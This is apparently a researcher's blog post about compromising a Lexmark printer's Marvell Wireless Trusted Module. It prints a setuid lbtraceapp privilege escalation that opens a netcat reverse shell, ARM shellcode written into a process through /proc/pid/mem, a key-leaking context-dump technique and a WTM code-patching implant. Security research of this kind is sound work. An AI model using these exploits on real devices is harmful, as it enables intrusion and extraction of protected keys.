Let's PWN WTM!

[+] Introduction

In the previous blogpost we talked about Lexmark’s attempt to protect their newer printer firmwares with an additional layer of root filesystem encryption assisted by this Wireless Trusted Module that is part of certain Marvell SoC’s. We demonstrated that by simply replaying some commands to this security processor on a rooted device is enough to turn it into an oracle that can help us decrypt any newer firmwares that are protected by this mechanism. While slightly anti-climatic, we did learn quite a bit about the way WTM works as well.

It’s time to go a bit deeper and explore the other commands supported by the WTM firmware, without going through the existing netlink protocol. We need a way to talk directly to the WTM MMIO interface for starters.

[+] Some assistance from the kernel

Prodding at things like this with a full linux userland to your disposal has some advantages. You can abstract some of the lower level privileged details away in a kernel module, and script the higher level stuff in something like python for a quick turnaround in testing out various things. When I broke the sonos root filesystem encryption I did a similar thing.

So I put together a quick kernel module that would let me peek/poke the WTM MMIO space from userland through sysfs. I also got a quick reminder of how terrible I am at cross-compiling linux kernel modules.

Then when I got to the point where it was time to load my new hax-assistance lkm I realized/memorized the persistent backdoor I was given by Rick did not infact provide me with a root shell, but just a low privileged one: so I could not even load the module. Let’s fix that first. :)

[+] I can haz root?

Luckily, due to some hints in the bulletin for ZDI-23-670, I was able to replicate a recently-ish fixed privilege escalation which was still present in the firmware running on my printer at this moment. Thank you, SYNACKTIV!

This LPE in /usr/bin/lbtraceapp (a setuid root binary) is hilariously stupid, so I’m going to skim over the explanation and just leave you with the exploit:

#!/bin/sh
echo "-e printk:console /usr/bin/nc 192.168.1.2 9797 -e /bin/sh" > /tmp/f
/usr/bin/lbtraceapp --apply-config=/tmp/f 2>&1

I’m not even sure what lbtraceapp is to be entirely honest, it appears to be some kind of frontend for ftrace based event tracing. But we don’t really care at this point, we got our precious rootshell. I automated some setup for sshd on the printer while I was at it, to get a more ergonomic shell experience. So we can load the LKM now, yay.

root@ET788C77F816DD:/run/cfs# insmod khax.ko
insmod: ERROR: could not insert module khax.ko: Operation not permitted

What?! Some kind of security policy that prevents us from loading kernel modules? Let’s quickly consult the code for the init_module syscall:

static int may_init_module(void)
{
	if (!capable(CAP_SYS_MODULE) || modules_disabled)
		return -EPERM;

	return 0;
}

SYSCALL_DEFINE3(init_module, void __user *, umod,
		unsigned long, len, const char __user *, uargs)
{
	int err;
	struct load_info info = { };

	err = may_init_module();
	if (err)
		return err;

	// ... 8< .....

	return load_module(&info, uargs, 0);
}

modules_disabled is definitly not true, the kernel infact has quite a few loaded modules already. Maybe we are missing the CAP_SYS_MODULE capability somehow?

root@ET788C77F816DD:~# cat /proc/self/status | grep '^Cap'
CapInh:	0000000000000000
CapPrm:	00000004002c74e2
CapEff:	00000004002c74e2
CapBnd:	00000004002c74e2
CapAmb:	0000000000000000

The CAP_SYS_MODULE capability has a mask of 0x10, which is indeed not set in the capability mask we inherited from our lbtraceapp LPE. Ouch.

[+] .. and all capabilities too, please.

So we need some way to elevate our capabilities to be able to load our kernel module. Peeping in the process tree I found this:

root      683  0.0  0.4   2820  2232 ?        Ss   Jul29  42:23 /bin/bash /usr/bin/wireless-heartbeat.sh
root     2783  0.0  0.0   2216   428 ?        S    03:25   0:00  \_ sleep 20

This is some shellscript that runs infinitely and between each action executes /bin/sleep 20. If we look at the capabilities mask for this sleep process we see:

root@ET788C77F816DD:~# cat /proc/$(pidof sleep)/status | grep '^Cap'
CapInh:	0000000000000000
CapPrm:	0000003fffffffff
CapEff:	0000003fffffffff
CapBnd:	0000003fffffffff
CapAmb:	0000000000000000

.. this process actually does have a fully enabled capabilities mask. so what if we hijack this process by stomping over some of its code using /proc/pid/mem?

#!/bin/sh
echo "/usr/bin/nohup /usr/sbin/sshd -f /tmp/sshconf &" > /tmp/s2
echo -en '\x10\xd0M\xe25\x00\x8f\xe2\x00\x00\x8d\xe51\x00\x8f\xe2\x04\x00\x8d\xe5\x00\x00\xa0\xe3\x0c\x00\x8d\xe5\r\x10\xa0\xe1\x10\x00\x8f\xe2\x0bp\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01p\xa0\xe3\x00\x00\x00\xef/bin/sh\x00\x00sh\x00\x00/tmp/s2\x00\x00\x00\x00' > /tmp/sc.bin

dd if=/tmp/sc.bin of=/proc/$(pidof sleep)/mem seek=464796 bs=1

This works nicely. We write some shellcode right after some code in .text where the nanosleep syscall is invoked. The shellcode execve’s another shellscript from /tmp, and from there we start the sshd. our ssh sessions now actually have a fully permissioned capabilities mask and we can load our kernel module.

root@ET788C77F816DD:/run/cfs# insmod khax.ko
root@ET788C77F816DD:/run/cfs# dmesg | tail
[  133.200196] HAX: init
[  133.202809] HAX: Listing all platform devices:
[  133.202895] HAX: Platform device: (c1a86440) -- d1d20000.wtm-mailbox-controller
[  133.208959] HAX: WTM base: e0be9000
[  133.212246] HAX: scratch: virt=ce58f918, phys=e528000
root@ET788C77F816DD:/run/cfs# lsmod | grep hax
khax                   16384  0

[+] The WTM MMIO command interface

Quickly circling back to the OLPC input driver that talks to the WTM in the linux kernel, we find these helpful register offset defines:

#define SECURE_PROCESSOR_COMMAND   0x40
#define COMMAND_RETURN_STATUS      0x80
#define COMMAND_FIFO_STATUS        0xc4
#define PJ_RST_INTERRUPT           0xc8
#define PJ_INTERRUPT_MASK          0xcc

Since the OLPC input driver only needs to transfer back-and-forth a minimal amount of data they only need to deal with a subset of the WTM MMIO space. They clear the SP_COMMAND_COMPLETE_RESET bit in the PJ_RST_INTERRUPT register, write their command to the SECURE_COMMAND_PROCESSOR register and wait for the COMMAND_FIFO_STATUS status to reach a certain value before reading the response back from the COMMAND_RETURN_STATUS register.

The commands implemented by the wtm-client.ko driver actually are a bit more complex and shove some additional arguments into the command parameter registers which start at register offset 0x00 up till 0x3c, for a total of 16 DWORDs. Similarly, the response to commands actually has an additional 16 registers starting at offset 0x84 up till 0xc0. In short:

  • command input consists out of a 32bit “command ID” and up to 64 bytes of data
  • command output consists out of a 32bit “command response” and up to 64 bytes data

There are some more bells and whistles in the register map, of course. But for our intents and purposes (sending commands and reading their response in a polled fashion) this is sufficiently enough information for now.

[+] LKM Helper primitives

In our little LKM helper module we implement the following primitives:

Command Arguments Explanation
CMD_WRITE8 offset, val write u8 val to MMIO + offset
CMD_WRITE16 offset, val write u16 val to MMIO + offset
CMD_WRITE32 offset, val write u32 val to MMIO + offset
CMD_READ8 offset read u8 from MMIO + offset
CMD_READ16 offset read u8 from MMIO + offset
CMD_READ32 offset read u8 from MMIO + offset
CMD_GET_SCRATCH - get a (physical) pointer to some scratch space
CMD_WTM_EXEC_CMD cmd_id, cmd_args execute WTM command cmd_id with arguments cmd_arguments

The ‘scratch space’ is a buffer allocated by the LKM. Some WTM commands expect a physical address containing additional data input/output. By writing to/reading from /dev/mem we can populate this scratch space and read it back in userspace.

[+] Exposing WTM I/O primitives over the network

To further ease in exploration we expose all these primitives using a TCP daemon. Now we can script WTM I/O operations from python on our own computer, instead of copying scripts to the printer and running them there.

For the sake of clarity here’s a poorly drawn diagram of what we have now:

Python talks over TCP/IP to the small daemon running on the printer in userland. The small daemon can peek poke the WTM interface MMIO through khax.ko via sysfs. The small daemon can also I/O the scratch buffer by going through /dev/mem. the khax.ko does the actual MMIO operations and house keeping of the scratch buffer. A lovely rube goldberg machine.

Now we can do things like:

from wtmclient import *
from util import hexdump

c = WTMClient()

scratch = c.get_scratch()
c.wtm_cmd(WTM_CMD_RNG, [0x80, scratch])
hexdump(c.scratch_read(0, 16))

The whole point is (I’ll just reiterate once again) to avoid recompiling/copying/running. Of course there’s many ways to automate these various tasks, but I’ve always preferred this RPC-ish abstraction of operations.

[+] Wrapped Keys

One of my main interests when it comes to the WTM (keeping in mind the Lexmark printer of course) is this “key (un)wrapping” mechanism. How does it actually work?

The concept of key wrapping is nothing new, of course. You take secret symmetric encryption keys, and you encrypt those with some even more secret keys that are even harder to access. Now your keys have their own keys and then all you need to do is introduce an easy oracle so the whole mechanism becomes useless. ;)

On a highlevel the Lexmark rootfs key unwrapping is done by a single netlink command 0x05 (CMD_AES_OPERATION). Under the hood this command is composed out of a few WTM commands, executed in this order: wtm_key_unwrap_load, followed by wtm_aes_init and finally wtm_aes_finish.

Let’s start by analyzing wtm_key_unwrap_load (0x8003). The arguments for this command are u16 cipher_id and u8 *blob. The cipher_id describes what kind of key we are unwrapping.

Some accepted cipher_id values are:

MODE_AES_128_ECB = 0x8000
MODE_AES_256_ECB = 0x8001
MODE_AES_128_CBC = 0x8004
MODE_AES_256_CBC = 0x8005

The blob is formed like this:

struct key_unwrap_blob_t {
  u32 cipher_id_a;
  u32 cipher_id_b;
  u8 iv[16];
  u8 body[0x200];
  u8 digest[0x20];
};

The highlevel and heavily simlified implementation of wtm_key_unwrap_load command looks something like this:

aes_select_hardware_key()
iv_decrypted = aes_ecb_decrypt(blob->iv, 0x10)
aes_select_hardware_key()
aes_set_iv(iv_decrypted)
body_decrypted = aes_cbc_decrypt(blob->body, 0x200)

if sha256(body_decrypted) == blob->digest:
  aes_state_zeroize()
  aes_load_key(decrypted_blob[0x20:0x20+aes_keywidth])
  return 0
else:
  return 0x154

here aes_select_hardware_key flips a bit in the hardware AES engine’s configuration register that makes it use a hidden/secret key, that is completely invisbible.

first the iv is decrypted, then the encrypted body is decrypted. finally, a SHA256 digest of the first 0x218 bytes (which is everything minus the digest) of the blob with now decrypted values is taken and compared against the digest value from the blob.

If the digest checks out the AES register state is completely zeroized/reset and the unwrapped key is loaded from the decrypted body at offset +0x20 into the hardware crypto engine’s key registers (different registers for AES, HMAC, etc.).

So there’s two unknowns (for us) here. First the secret hardware key, and secondly the unwrapped key from the decrypted keyblob, which is loaded directly into the AES engine.

This unwrapped key is then used to (in lexmark’s case) to decrypt the encrypted root filesystem key.

While digging through the (quite extensive) command list in the WTM firmware I found some commands with peculiar names:

0x3001: wtm_load_engine_context
0x3002: wtm_store_engine_context
0x3003: wtm_load_engine_context_external
0x3004: wtm_store_engine_context_external

After reversing them I learned they are used to save/restore the crypto engine state. The _external variants will save/load the state to/from some DRAM address we provide. Let’s see what state is actually preserved when saving, for the AES engine:

int __fastcall aes_store_context(int a1)
{
  mem_move32(a1 + 0x10, 0xD1D21000, 7);
  mem_move32(a1 + 0x68, 0xD1D21058, 21);
  return 0;
}

0xD1D21000 is the base address for the AES engine MMIO. So it saves 7 registers starting at offset 0x00, and another 21 registers starting at offset 0x58. These are spilled back to a DRAM address we provide (at offset 0x10 and 0x68 respectively).

Let’s have a look at the register map for the AES engine, as far as I’ve managed to infer by looking at code, anyway:

0x00: CONTROL
..
0x0c: STATUS
..
0x18: SIZE
[0x78 .. 0x98]: KEY
[0x98 .. 0xA8]: IV

Yes sorry, quite some gaps and unknowns. But importantly, the KEY registers are are actually preserved when this wtm_store_engine_context_external command is invoked.

Let’s try it out with the wrapped keyblob from lexmark:

c = WTMClient()

scratch = c.get_scratch()

# write wkey4 to scratch
c.scratch_write(0, open("wkey4.bin", "rb").read())

# load wrapped key
c.wtm_cmd(WTM_CMD_KEY_UNWRAP_LOAD, [MODE_AES_256_CBC, scratch])
rv = c.io_read32(REG_CMD_RETURN_STATUS)
assert rv == 0

# store AES engine context to scratch buffer
c.scratch_write(0, b"\xAA" * 0x100)
c.wtm_cmd(WTM_CMD_STORE_ENGINE_CONTEXT_EXTERNAL, [MODE_AES_256_CBC, scratch])
rv = c.io_read32(REG_CMD_RETURN_STATUS)
print("Store engine context status: 0x%08x" % rv)

# dump it to the screen
hexdump(c.scratch_read(0, 0x100))
$ python3 test_unwrap.py
Store engine context status: 0x00000000
00000000: aaaa aaaa aaaa aaaa aaaa aaaa 0580 0000  ................
00000010: 0200 0000 0000 0000 0000 0000 0000 0000  ................
00000020: 0000 0000 0000 0000 0000 0000 aaaa aaaa  ................
00000030: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa  ................
00000040: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa  ................
00000050: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa  ................
00000060: aaaa aaaa aaaa aaaa 0000 0000 0000 0000  ................
00000070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000080: 0000 0000 0000 0000 7930 6820 6430 3064  .........}d*.t./
00000090: 2c20 6730 2064 756d 7020 6a30 3072 2030  $O....U58....i.[
000000a0: 776e 206b 3379 7a21 0000 0000 0000 0000  0....=.w........
000000b0: 0000 0000 0000 0000 0100 0000 aaaa aaaa  ................
000000c0: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa  ................
000000d0: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa  ................
000000e0: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa  ................
000000f0: aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa  ................

We expect the key bits to be at 0x88 and onwards .. and well what do you know, there actually appears to be data there!

If we do a AES-256-CBC decrypt operation on the encrypted rootFS key with the IV that is stored alongside the encrypted rootFS key and the key we just dumped from the AES engine state we do infact get the correct decrypted rootFS key!

So this intermediary key that is typically not leaving WTM can actually be leaked back, fun. We’re still missing the secret algorithm/key that is used by the AES engine though. What we do gain here is the capability to completely decrypt new root filesystem keys offline as long as the wrapped keys are re-used. Lexmark has already been re-using their wrapped keys in newer firmwares. And new wrapped keys can be unwrapped and dumped for offline usage using our oracle capabilities of course.

[+] Going deeper

All this highlevel peeky-pokey of the WTM MMIO interface from the Application Processor side is fun of course, but wouldn’t it be neat if we could get arbitrary code execution on the WTM itself?

There is a ton of commands, surely one of them has a dumb vulnerability? We could audit them all and find something perhaps. We know some of the WTM commands take physical DRAM pointers as arguments, and it can read/write (also through a DMA engine) to them. Makes sense the WTM can access the Application processor’s DRAM.

.. wait a second ..

Is there some dedicated DRAM for the WTM itself, surely they can’t run a full fledged linux kernel entirely from some dedicated SRAM? Or are they.. sharing the same DRAM between the AP and the WTM? That would be naive, right?

Turns out, the WTM’s linux kernel runs entirely from the same DRAM that is fully accessible by the Appllication Processor. The Wireless Trusted Module™ can be compromised simply by poking into /dev/mem from the Untrusted Module™ (lol) at the right spots.

[+] WTM RCE Strategy

Okay, let’s come up with a strategy here. It would be nice if we could expand our existing exploration infrastructure with another layer of indirection. Since we can already talk to the WTM directly through the MMIO command interface it would be nice to replace some pointless command with some shellcode of our own. The replaced command can then implement some sub-commands to do various operations/primitives, but this time executed from the context of code running on the WTM itself!

I chose to hijack the handler for wtm_dh_shared_key_gen for no good reason other than because it’s command ID is 0x9001 (its over 9000 lololol).

We’re introducing a really basic implant there:

cmp	r0, #1
beq	cmd_peek32
cmp	r0, #2
beq	cmd_poke32

mov	r0, #0
bx	lr

cmd_peek32:
ldr	r1, [r1]
str	r1, [r2]
bx	lr

cmd_poke32:
str	r2, [r1]
mov	r0, #0
bx	lr

We locate the wtm_dh_shared_key_gen code by scanning through all of DRAM via /dev/mem, and then we stomp over it with our small handler replacement code.

Quite lazy, but we can add some powerful new primitives to our WTMClient python codebase now:

WTM_CMD_HAX = 0x9001

def wtm_read32(self, addr):
    self.wtm_cmd(WTM_CMD_HAX, [WTM_HAX_CMD_READ32, addr, self.scratch])
    return struct.unpack("<L", self.scratch_read(0, 4))[0]

def wtm_write32(self, addr, value):
    self.wtm_cmd(WTM_CMD_HAX, [WTM_HAX_CMD_WRITE32, addr, value])

def wtm_clear32(self, addr, value):
    self.wtm_write32(addr, self.wtm_read32(addr) & (~value & 0xFFFFFFFF))

def wtm_set32(self, addr, value):
    self.wtm_write32(addr, self.wtm_read32(addr) | value)

[+] Now what?

Let’s confirm it works by ehm, reading the WTM BootROM I guess?

from wtmclient import *

c = WTMClient()

ROM_BASE = 0xFFE00000
ROM_SIZE = 0x00020000

rom = b""
for i in range(ROM_SIZE // 4):
    rom += c.wtm_read32(ROM_BASE + i * 4).to_bytes(4, "little")

with open("rom.bin", "wb") as f:
    f.write(rom)

Let’s try to dump the full eFUSE/OTP array while we’re at it. There is a highlevel WTM command wtm_otp_block_read (0x2009), but it doesn’t actually provide unrestricted access to the full OTP. it keeps a curated list of entries you can access.

Using our WTM peek/poke implant it’s simple enough to read it out fully by peeking at the right MMIO addresses for the OTP/eFUSE peripheral:

from wtmclient import *

c = WTMClient()

OTP_BASE = 0xD1D22800
OTP_SIZE = 0x800

o = b""
for i in range(OTP_BASE, OTP_BASE + OTP_SIZE, 4):
    o += struct.pack("<I", c.wtm_read32(i))

with open("otp.bin", "wb") as f:
    f.write(o)

What’s really left (and somewhat worthwhile, for a certain twisted definition of worthwhile) to do though is figuring out how the hidden hardware AES key stuff works. I’ve tried some obvious things like partial key overwrites and whatnot, but so far I haven’t had any luck. That said, I haven’t invested too much time into it either. It’s mostly a prestige thing. Our original goal (dealing with lexmark’s pesky new rootfs encryption) has long been dealt with. ;-)

[+] Conclusion

I had quite some fun working on this software-only OSINT and blackbox-y approach to breaking into the Marvell WTM, and I hope you had some fun reading. The writeup was (as always) done months after the actual hacking, so I hope I didn’t mess up any details. I’ve tried to structure the blogposts as some kind of incremental buildup, but the actual order of my research at the time was very out-of-order with what you read here. I’ve cleaned up a bit and published all the relevant code.

Enjoy!